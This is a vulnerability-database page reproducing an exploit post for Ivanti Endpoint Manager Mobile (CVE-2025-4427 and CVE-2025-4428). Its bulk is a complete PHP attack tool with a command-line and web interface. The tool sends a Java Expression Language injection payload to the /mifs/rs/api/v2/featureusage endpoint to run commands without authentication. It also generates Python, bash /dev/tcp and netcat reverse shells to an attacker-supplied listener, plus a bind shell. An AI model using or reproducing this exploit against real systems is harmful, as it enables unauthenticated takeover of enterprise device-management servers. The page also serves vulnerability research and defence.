Vulners
Lucene search
📄 Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection
| Reporter | Title | Published | Views | Family All 69 |
|---|---|---|---|---|
 | Exploit for Code Injection in Ivanti Endpoint_Manager_Mobile | 16 May 202500:42 | – | githubexploit |
| Exploit for Authentication Bypass Using an Alternate Path or Channel in Ivanti Endpoint_Manager_Mobile | 15 May 202513:59 | – | githubexploit |
| Exploit for Authentication Bypass Using an Alternate Path or Channel in Ivanti Endpoint_Manager_Mobile | 31 Aug 202519:00 | – | githubexploit |
 | CVE-2025-4428 | 13 May 202500:00 | – | attackerkb |
| CVE-2025-4427 | 13 May 202500:00 | – | attackerkb |
 | June Linux Patch Wednesday | 1 Jul 202511:28 | – | avleonov |
 | CVE-2025-4427 | 13 May 202516:30 | – | circl |
| CVE-2025-4428 | 13 May 202516:30 | – | circl |
 | Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability | 19 May 202500:00 | – | cisa_kev |
| Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability | 19 May 202500:00 | – | cisa_kev |
10
=============================================================================================================================================
| # Title : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ivanti.com/products/endpoint-manager-mobile |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/200146/ & CVE-2025-4427, CVE-2025-4428
[+] Summary :
The exploit targets two critical vulnerabilities in Ivanti EPMM:
CVE-2025-4427 - Authentication Bypass
CVE-2025-4428 - Expression Language Injection
The vulnerability chain allows unauthenticated attackers to execute arbitrary commands
on the target system through Java Expression Language (EL) injection in the /mifs/rs/api/v2/featureusage endpoint.
[+] Exploitation Mechanism
Endpoint Discovery: The exploit targets /mifs/rs/api/v2/featureusage
Payload Injection: Uses Java EL injection via the format parameter
Command Execution: Leverages Java runtime reflection to execute system commands
Result Extraction: Uses Java Scanner class to read command output
[+] POC :
php poc.php or http://127.0.0.1/poc.php
php poc.php -t target.com -c
php poc.php -t 192.168.1.100 -P command
php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444
<?php
/*
* by indoushka
* CVE-2025-4427, CVE-2025-4428 - Ivanti EPMM RCE Exploit
*/
class IvantiEPMMExploit {
private $target;
private $port;
private $ssl;
private $base_path;
private $timeout;
public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
$this->target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->base_path = rtrim($base_path, '/');
$this->timeout = 30;
}
/**
* Vulnerability check
*/
public function check() {
echo "[*] Checking Ivanti EPMM vulnerability...\n";
$command = 'id';
$response = $this->execute_command($command);
if (!$response) {
echo "[-] Failed to get response from target\n";
return "unknown";
}
if (strpos($response, 'uid=') !== false && strpos($response, 'gid=') !== false) {
echo "[+] ✓ Target is vulnerable!\n";
return "vulnerable";
} else {
echo "[-] ✗ Target is not vulnerable\n";
return "safe";
}
}
/**
* Execute remote command
*/
private function execute_command($command) {
// Build Expression Language Injection payload
$payload = $this->build_el_payload($command);
$url = $this->build_url('/mifs/rs/api/v2/featureusage');
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url . '?format=' . urlencode($payload),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[*] HTTP Status: $http_code\n";
return $response;
}
/**
* Build Expression Language Injection payload
*/
private function build_el_payload($command) {
// Java Expression Language Injection for command execution
$payload = "\${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('{$command}').getInputStream()).useDelimiter('\\\\\\\\A').next()}";
return $payload;
}
/**
* Main exploit execution
*/
public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null) {
echo "[*] Starting Ivanti EPMM exploitation...\n";
// Create payload based on type
$payload_cmd = $this->generate_payload($payload_type, $lhost, $lport);
if (!$payload_cmd) {
echo "[-] Failed to generate payload\n";
return false;
}
echo "[*] Executing payload...\n";
$response = $this->execute_command($payload_cmd);
if ($response) {
echo "[+] ✓ Payload sent successfully\n";
echo "[*] Check your reverse connection\n";
return true;
} else {
echo "[-] ✗ Failed to execute payload\n";
return false;
}
}
/**
* Generate different payloads
*/
private function generate_payload($type, $lhost, $lport) {
switch ($type) {
case 'reverse_shell':
if (!$lhost || !$lport) {
echo "[-] IP and port required for reverse shell\n";
return false;
}
return $this->generate_reverse_shell($lhost, $lport);
case 'bind_shell':
if (!$lport) {
echo "[-] Port required for bind shell\n";
return false;
}
return $this->generate_bind_shell($lport);
case 'command':
return 'id; whoami; uname -a; pwd';
default:
return 'id; whoami';
}
}
/**
* Generate reverse shell
*/
private function generate_reverse_shell($lhost, $lport) {
// Multiple reverse shells
$shells = [
// Python reverse shell
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$lhost}\",{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",
// Bash reverse shell
"bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'",
// Netcat reverse shell
"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$lhost} {$lport} >/tmp/f"
];
return $shells[0]; // Use Python as default
}
/**
* Generate bind shell
*/
private function generate_bind_shell($lport) {
return "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"0.0.0.0\",{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'";
}
/**
* Build full URL
*/
private function build_url($path) {
$protocol = $this->ssl ? 'https' : 'http';
$full_path = $this->base_path . $path;
return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
}
}
// CLI Interface
if (php_sapi_name() === 'cli') {
echo "
██╗██╗ ██╗ █████╗ ███╗ ██╗████████╗██╗
██║██║ ██║██╔══██╗████╗ ██║╚══██╔══╝██║
██║██║ ██║███████║██╔██╗ ██║ ██║ ██║
██║╚██╗ ██╔╝██╔══██║██║╚██╗██║ ██║ ██║
██║ ╚████╔╝ ██║ ██║██║ ╚████║ ██║ ██║
╚═╝ ╚═══╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝
Ivanti EPMM RCE ExploitPHP Implementation
\n";
$options = getopt("t:p:s:u:c:P:L:H:", [
"target:",
"port:",
"ssl",
"uri:",
"check",
"payload:",
"lhost:",
"lport:"
]);
$target = $options['t'] ?? $options['target'] ?? null;
$port = $options['p'] ?? $options['port'] ?? 443;
$ssl = isset($options['s']) || isset($options['ssl']);
$base_uri = $options['u'] ?? $options['uri'] ?? '/';
$check_only = isset($options['c']) || isset($options['check']);
$payload_type = $options['P'] ?? $options['payload'] ?? 'command';
$lhost = $options['H'] ?? $options['lhost'] ?? null;
$lport = $options['L'] ?? $options['lport'] ?? 4444;
if (!$target) {
echo "Usage: php poc.php [options]\n";
echo "Options:\n";
echo " -t, --target Target host (required)\n";
echo " -p, --port Target port (default: 443)\n";
echo " -s, --ssl Use SSL (default: true)\n";
echo " -u, --uri Base URI path (default: /)\n";
echo " -c, --check Check only (don't exploit)\n";
echo " -P, --payload Payload type: command, reverse_shell, bind_shell (default: command)\n";
echo " -H, --lhost Listener host for reverse shell\n";
echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
echo "\nExamples:\n";
echo " php poc.php -t 192.168.1.100 -c\n";
echo " php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
exit(1);
}
$exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
if ($check_only) {
$result = $exploit->check();
echo "\n[*] Result: {$result}\n";
} else {
if ($exploit->exploit($payload_type, $lhost, $lport)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
}
} else {
// Web Interface - FIXED VERSION
// Check if form was submitted
$action = $_POST['action'] ?? '';
if ($action === 'check' || $action === 'exploit') {
$target = $_POST['target'] ?? '';
$port = $_POST['port'] ?? 443;
$ssl = isset($_POST['ssl']);
$base_uri = $_POST['uri'] ?? '/';
$payload_type = $_POST['payload_type'] ?? 'command';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? 4444;
if (empty($target)) {
echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
} else {
$exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
ob_start();
if ($action === 'check') {
$exploit->check();
} else {
$exploit->exploit($payload_type, $lhost, $lport);
}
$output = ob_get_clean();
echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
}
// Show the form again after execution
echo '<a href="'.htmlspecialchars($_SERVER['PHP_SELF']).'" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
} else {
// Display the form
echo '<!DOCTYPE html>
<html>
<head>
<title>Ivanti EPMM RCE Exploit</title>
<meta charset="UTF-8">
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background: #f5f5f5;
}
.container {
max-width: 800px;
margin: 0 auto;
background: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #007cba;
padding-bottom: 10px;
}
h3 {
color: #666;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
color: #333;
}
input[type="text"], select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 14px;
}
.checkbox-group {
display: flex;
align-items: center;
gap: 10px;
}
button {
background: #007cba;
color: white;
padding: 12px 25px;
border: none;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;
font-size: 16px;
transition: background 0.3s;
}
button:hover {
background: #005a87;
}
.danger {
background: #dc3545;
}
.danger:hover {
background: #c82333;
}
.info {
background: #17a2b8;
}
.info:hover {
background: #138496;
}
.warning-box {
background: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
.info-box {
background: #d1ecf1;
border: 1px solid #bee5eb;
color: #0c5460;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Ivanti EPMM RCE Exploit</h1>
<h3>CVE-2025-4427 & CVE-2025-4428 - Authentication Bypass & RCE</h3>
<div class="warning-box">
<strong>⚠️ Warning:</strong> This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
</div>
<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or target.com" required>
</div>
<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="443">
</div>
<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>
<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="command">Test Command (id; whoami)</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
</select>
</div>
<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>
<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>
<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>
<div class="info-box">
<h3>About CVE-2025-4427 & CVE-2025-4428:</h3>
<p><strong>Vulnerability:</strong> Authentication Bypass + Expression Language Injection</p>
<p><strong>Affected Products:</strong> Ivanti EPMM, MobileIron Core</p>
<p><strong>Impact:</strong> Unauthenticated Remote Code Execution</p>
<p><strong>Endpoint:</strong> /mifs/rs/api/v2/featureusage</p>
<p><strong>CVSS Score:</strong> 9.8 (Critical)</p>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 3.17.2 - 8.8
EPSS0.91261